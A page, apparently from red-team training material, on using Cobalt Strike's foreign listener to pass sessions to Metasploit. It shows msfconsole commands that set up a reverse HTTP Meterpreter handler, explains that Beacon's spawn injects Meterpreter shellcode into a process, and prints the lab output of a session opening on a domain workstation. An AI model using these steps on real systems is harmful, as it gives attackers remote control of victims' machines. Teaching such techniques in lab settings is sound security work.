Foreign Listener

The foreign listener in Cobalt Strike is designed to stage Meterpreter HTTP/HTTPS implants from Beacon, although it's technically compatible with any implant that supports the MSF staging protocol. Start msfconsole and create a new reverse HTTP Meterpreter listener.

attacker@ubuntu ~> sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST ens5
msf6 exploit(multi/handler) > set LPORT 8080

You must use the "staged" reverse_http payload type and ensure you use a port that Cobalt Strike is not already listening on.

msf6 exploit(multi/handler) > run

[*] Started HTTP reverse handler on http://10.10.5.50:8080

Go to the listener management in Cobalt Strike and create a new Foreign HTTP listener. The stager host and port must match your MSF multi handler.

This listener will now be available within all the relevant Beacon commands such as spawn, jump and elevate. For instance, spawn msf will spawn a process and inject Meterpreter shellcode into it, thus giving us a Meterpreter session.

[*] http://10.10.5.50:8080 handling request from 10.10.122.254; (UUID: t6qekc2g) Staging x86 payload (176732 bytes) ...
[*] Meterpreter session 1 opened (10.10.5.50:8080 -> 127.0.0.1) at 2022-09-05 11:29:54 +0000

meterpreter > sysinfo
Computer        : WKSTN-2
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : DEV
Logged On Users : 11
Meterpreter     : x86/windows

Two downsides to the foreign listener is that it only supports x86 staged payloads (no x64 or stageless).

PreviousBeacon Passing NextSpawn & Inject

Last updated 2 years ago